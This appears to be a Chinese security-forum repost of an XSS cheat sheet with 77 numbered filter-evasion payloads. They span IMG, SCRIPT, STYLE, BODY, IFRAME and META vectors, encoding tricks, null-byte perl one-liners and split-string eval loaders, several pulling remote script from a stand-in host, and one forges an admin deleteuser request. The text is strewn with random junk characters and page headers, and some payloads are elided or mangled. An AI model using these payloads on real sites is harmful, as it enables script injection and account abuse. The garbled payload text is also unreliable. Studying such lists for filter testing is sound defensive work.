貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。5 O# H' j- y1 R
(1)普通的XSS JavaScript注入) }" T0 I7 K+ t, t
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# g) k, x' @! D0 V(2)IMG标签XSS使用JavaScript命令
6 L& m5 h1 Z# C% K0 A7 p6 P R<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 s9 x, _+ O+ R1 r$ ?4 a% V, G
(3)IMG标签无分号无引号
3 r4 i3 d: \3 J- o<IMG SRC=javascript:alert(‘XSS’)>, Q+ d2 ~# e2 I6 D/ n' Q
(4)IMG标签大小写不敏感
" g+ b2 T, N# r# h4 ]<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* W: h1 \8 p& l7 R% K2 [1 b(5)HTML编码(必须有分号)
| Q. T$ P+ a<IMG SRC=javascript:alert(“XSS”)>5 J2 i) ~( H% W4 U `
(6)修正缺陷IMG标签
/ c1 {( m% b& f) y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! \# s6 {3 n$ c3 A
5 [- ^! D3 j0 N. N3 {8 k9 n J% i+ u
4 r, n$ h8 w# Z n% {( K! u(7)formCharCode标签(计算器)6 t! H; ^! J# R7 p k. o4 Q! p
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
3 D7 |9 W: g. X4 C" t(8)UTF-8的Unicode编码(计算器)
& w# o, x+ s1 x4 |5 V# D( X* z. q<IMG SRC=jav..省略..S')>$ T$ c; ]" }5 B2 l0 `) X6 \
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
4 l# ?6 O) I* f<IMG SRC=jav..省略..S')>
0 Z; I1 k8 x3 T2 {/ e7 t* @(10)十六进制编码也是没有分号(计算器)* m$ l2 i+ f# f- G( m
<IMG SRC=java..省略..XSS')>
( t% N! A$ U* c# T% j) c# }(11)嵌入式标签,将Javascript分开
4 L' C/ z3 Z: k {" n6 d9 H<IMG SRC=”jav ascript:alert(‘XSS’);”>
) n- a. E0 t" X1 w# G( Q(12)嵌入式编码标签,将Javascript分开
- p2 n; i( N) {4 l7 W# \<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 r2 p2 P% _9 L0 B6 O& q(13)嵌入式换行符
) u+ }3 u; }4 o" ~4 Q<IMG SRC=”jav ascript:alert(‘XSS’);”>: f4 A9 J* K/ F" F, `/ J
(14)嵌入式回车
+ O' l. G L1 r: o<IMG SRC=”jav ascript:alert(‘XSS’);”>
& t! m( f0 a: H4 T3 M/ L(15)嵌入式多行注入JavaScript,这是XSS极端的例子; ^* C& [2 S7 E
<IMG SRC=”javascript:alert(‘XSS‘)”>. _% H( Z/ s+ W. x1 [" k
(16)解决限制字符(要求同页面)) v8 s( v: ^$ ]2 T
<script>z=’document.’</script>
0 O, B- I" u4 y$ M<script>z=z+’write(“‘</script>
1 ~. ]1 w* m# Z<script>z=z+’<script’</script>/ J# M# H. n% l% @
<script>z=z+’ src=ht’</script>
. [/ ]' x! s w( F7 H6 r<script>z=z+’tp://ww’</script>! b& P. Q' R2 w) o( A, g( M
<script>z=z+’w.shell’</script>! I" j7 |- d8 r. U
<script>z=z+’.net/1.’</script>
5 n* ^+ P( _! E8 r$ A1 ^<script>z=z+’js></sc’</script># g* ?) y/ H4 L- ^) t; D: J
<script>z=z+’ript>”)’</script># x: n2 U @3 J; f9 I5 {+ n4 b9 x
<script>eval_r(z)</script>
$ b. W" Q) [: A6 b+ U& u(17)空字符12-7-1 T00LS - Powered by Discuz! Board
: g9 ^ @9 c8 `* r4 j( l: F0 h. _9 fhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6+ `% Y ~# q& I% m2 F
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
1 _. {. I$ g) q" x" E! E% b" V(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
1 A1 J: C* p, o" c: f! O- qperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
/ A# W) Q' e, ^0 U7 @" w(19)Spaces和meta前的IMG标签
c1 F1 z+ z$ i/ M<IMG SRC=” javascript:alert(‘XSS’);”>3 S h" x6 h2 ], f
(20)Non-alpha-non-digit XSS
( {" X1 j* W% H4 X# h( E<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ h2 j4 J% Y5 E0 V0 \(21)Non-alpha-non-digit XSS to 2
0 c$ {- n# Q% h8 i9 q# j<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 B. F, O0 q* J" X5 X
(22)Non-alpha-non-digit XSS to 3
, E# G0 J0 ^' h" C<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>& Y8 u1 j" L) f$ K4 l
(23)双开括号3 d7 V- h# g: R" T5 C1 C
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ r3 ]% l. y) i9 u( N1 j1 H3 b(24)无结束脚本标记(仅火狐等浏览器)
3 f% A6 n3 Z) P9 N* ]3 o<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) Y0 w8 h8 J* V! N; {(25)无结束脚本标记2
Q7 Y/ F/ x/ }. f1 ?<SCRIPT SRC=//3w.org/XSS/xss.js>
. M+ @% ^/ K) u/ G* [) i(26)半开的HTML/JavaScript XSS3 x" x A: l' W# k5 a
<IMG SRC=”javascript:alert(‘XSS’)”
( W$ t$ Q+ O! n& n3 N& R. s6 ](27)双开角括号
v2 U+ _: ?, J+ |/ O<iframe src=http://3w.org/XSS.html <
( L' u- N/ V2 s1 J(28)无单引号 双引号 分号0 I3 R+ w7 V& ^* L# q& {5 ^
<SCRIPT>a=/XSS/! _/ \# d" W, u- d! B0 \
alert(a.source)</SCRIPT>1 ?" x5 g/ l$ Y! L1 q" l$ X
(29)换码过滤的JavaScript
# L* I; [) S' Y( [, N1 o7 J0 t\”;alert(‘XSS’);//0 ~& v$ c1 q, l+ D1 q
(30)结束Title标签$ a+ n. @ p' H+ E8 `1 Q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>: c( P6 V: c3 S, a
(31)Input Image8 H# B" j1 O6 c- U
<INPUT SRC=”javascript:alert(‘XSS’);”>6 t5 ?3 v/ O$ G- U1 d) u
(32)BODY Image
) f7 M6 O& }1 M3 r0 |<BODY BACKGROUND=”javascript:alert(‘XSS’)”>8 _1 i- I' O' W# e4 q
(33)BODY标签
8 s' l) t- b' ~0 G<BODY(‘XSS’)>) U# X. R( }9 F- |
(34)IMG Dynsrc1 `& j" u9 l6 U& d
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
& O2 l, L( K( g* _" f(35)IMG Lowsrc* E; `5 B* O& m7 l
<IMG LOWSRC=”javascript:alert(‘XSS’)”>. D8 U0 ^6 u. B+ c t
(36)BGSOUND
- @ s4 I0 J5 C* {<BGSOUND SRC=”javascript:alert(‘XSS’);”>$ p5 m) t6 t# q, B( n- t' ^
(37)STYLE sheet' D* l! p- G4 T* G! o9 c" q# g
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>1 }) {! k! x4 \6 e
(38)远程样式表
& m+ G. Z: n8 S1 \<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! D; v! P5 h3 q7 {(39)List-style-image(列表式)
) n# p; }8 B/ O$ m+ F<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
. |% }3 P, d5 X0 b5 s( Y* C$ y! r(40)IMG VBscript
# _' o- N+ U" ?<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 R! J# j. D l4 Q' `; U(41)META链接url
, [! W$ ], i! ~3 D) u
: l* {. F7 x! X4 n
6 {9 B1 C& F5 \<META HTTP-EQUIV=”refresh” CONTENT=”0;
* F' o s Z3 [$ Q& Y. C- a# o( ?URL=http://;URL=javascript:alert(‘XSS’);”>
( N% }5 T& R3 V# g' V* K7 V' X(42)Iframe
% t8 y/ E3 g: f4 f! I<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>7 n9 m; l/ N+ t5 c; l' C1 r
(43)Frame6 n3 }9 S3 Z6 w+ `9 a& p
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board# \8 c4 l0 W' |- Q2 ]* d! u
https://www.t00ls.net/viewthread ... table&tid=15267 3/67 T7 q2 j- u2 j; y1 z
(44)Table) m5 `6 h- c" O
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) q% K+ U% [" J, ]7 Z$ s
(45)TD9 U4 _* Q- x6 R
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
S2 i. Y9 K9 C; W(46)DIV background-image
: q/ h e, O( X, R5 @9 E<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" z9 T' J1 b, @; C(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-: H7 L2 U) O. R( l0 m3 U( }
8&13&12288&65279)) e, g- S. t8 A( a$ _" j* i
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% Q" b1 @4 D' s3 h) u! ](48)DIV expression
3 Z3 ~% ?5 ~" U( i/ O<DIV STYLE=”width: expression_r(alert(‘XSS’));”>' S; ]. Q, U# X4 a2 p" a0 F$ [
(49)STYLE属性分拆表达; R6 P- j% {0 N2 K) W# T, c
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 X2 v# [) R* T7 G! U+ M: N; J+ h(50)匿名STYLE(组成:开角号和一个字母开头)
- K8 ?3 b! g. e6 T8 y) W<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
6 D' R. g/ t; I# @2 R(51)STYLE background-image
6 Y7 D8 x9 `; T<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
* i9 F9 t0 _. J2 F+ ?7 HCLASS=XSS></A>8 x ] Q" a3 D
(52)IMG STYLE方式. F& W6 \. F6 C, |. X' [& K+ k* a5 H4 }
exppression(alert(“XSS”))’>. F4 r- u% g* W+ X& n. P( L7 w
(53)STYLE background0 [6 C" v$ Y H: ?) @
<STYLE><STYLE' Z$ Z; p' H1 N6 G/ z2 o8 O( z( }0 \
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>* R, T$ B4 F& R' f! o& z
(54)BASE
) ?/ e: ~4 U& y/ a2 S2 x6 l K/ f* P<BASE HREF=”javascript:alert(‘XSS’);//”>+ H0 F: |8 c/ C6 }
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS q4 U3 T& B! t! d
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>& y+ i: S$ e; o# S; D/ ^& r
(56)在flash中使用ActionScrpt可以混进你XSS的代码
* o- g g) O/ p% r- A0 Ia=”get”;
$ A, ]$ R6 m8 Y* {. B A8 Hb=”URL(\”";7 D% g- `) c- d5 J" z: ?, h% \
c=”javascript:”;# e/ X/ e( A+ a
d=”alert(‘XSS’);\”)”;* A- T+ i W" w! t8 O1 O9 X
eval_r(a+b+c+d);: c! H5 G8 }- H( Z
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上: @) D+ \+ l! {: U/ }
<HTML xmlns:xss>
2 G) q' H5 `) }& [' s- D* V<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
$ r* P0 O% P% d( w T- P Q<xss:xss>XSS</xss:xss>) I$ P; s: x+ B/ k9 H- g
</HTML>
- c- M% @$ O1 o& c2 I1 Q(58)如果过滤了你的JS你可以在图片里添加JS代码来利用8 d7 \: _4 P5 ~; y1 E+ j# J
<SCRIPT SRC=””></SCRIPT>+ |3 ]* i- P6 r) O& E
(59)IMG嵌入式命令,可执行任意命令0 o5 ]2 K$ {: l# Q2 S" K9 {
<IMG SRC=”http://www.XXX.com/a.php?a=b”>3 l9 E b/ O5 f# h! e
(60)IMG嵌入式命令(a.jpg在同服务器)% e! P7 P1 U5 H+ f, G6 R1 J
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
/ ?( y# ?& y; B( u4 f: ~+ `; \+ `(61)绕符号过滤
+ ~& n4 ~7 Q1 f% S" U<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 m2 G0 r8 q$ b6 u(62)5 ~: ^. J5 H, d& d( ?& y1 Q. L; O
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' m$ O" |* L' V7 {" @8 E- y(63)3 @; Q( K4 Q) X/ p, `/ z
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>3 h- u6 K: ~8 E7 A. n5 N
(64)
) [& j5 c8 ^, v+ u: W<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( c! j$ x( k+ [# S4 H/ m
(65). I/ D/ B) G; D' R1 K
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>. ?7 V6 E9 B: ?+ g- Z
(66)12-7-1 T00LS - Powered by Discuz! Board- @; L0 ~' a5 k5 z$ j
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
* g* V0 ~6 b" \4 `<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>5 W8 I5 W! E% ]3 T
(67): O! A4 v5 A% O# \
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>3 E# t0 {: p9 ~% X7 p- V
</SCRIPT>
: B! q+ ]# F" p(68)URL绕行, B# C! H0 [4 |+ D
<A HREF=”http://127.0.0.1/”>XSS</A>3 d/ q5 d9 f- C; C
(69)URL编码0 N2 \4 c1 M+ v. R
<A HREF=”http://3w.org”>XSS</A>
0 Q4 i* C3 k- ^1 h8 q0 I(70)IP十进制* b9 c- R& N& m8 ^
<A HREF=”http://3232235521″>XSS</A>
5 P3 h% F' m w' b(71)IP十六进制1 {2 I7 d. G; z; Q9 {' c
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>. M9 I% B- I* K0 i
(72)IP八进制: S( Z( q' x; v7 U& |3 e0 c0 v! ~
<A HREF=”http://0300.0250.0000.0001″>XSS</A>- ^5 j5 r0 @& V Y; G$ K( n
(73)混合编码" z! d3 E7 G1 B7 V0 z0 g
<A HREF=”h
1 J5 w: O" T% U: ?8 k6 Stt p://6 6.000146.0×7.147/”">XSS</A>$ U2 x& ? g) l# z5 Y c: x% `
(74)节省[http:]
3 \$ d( r- ?$ S1 w<A HREF=”//www.google.com/”>XSS</A>
$ j7 N8 D! F9 Z2 x) t" V! k' t" g(75)节省[www]6 v# R' K+ T% j
<A HREF=”http://google.com/”>XSS</A>( h: i+ n- w, a) I+ [
(76)绝对点绝对DNS
0 z* V7 x1 N) A) @<A HREF=”http://www.google.com./”>XSS</A>2 Y! b# j o, Q8 K7 c0 p/ x
(77)javascript链接; [" [8 H! M d U0 K3 D
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>1 S& Z* [& v' n% J
( Q' K; b9 K2 \$ I* W7 L原文地址:http://fuzzexp.org/u/0day/?p=14
Y/ A& V6 S2 \; B; u, n3 a
. y& ~' s9 d b1 I |
发表于 2013-4-19 19:22:37
收藏
支持
反对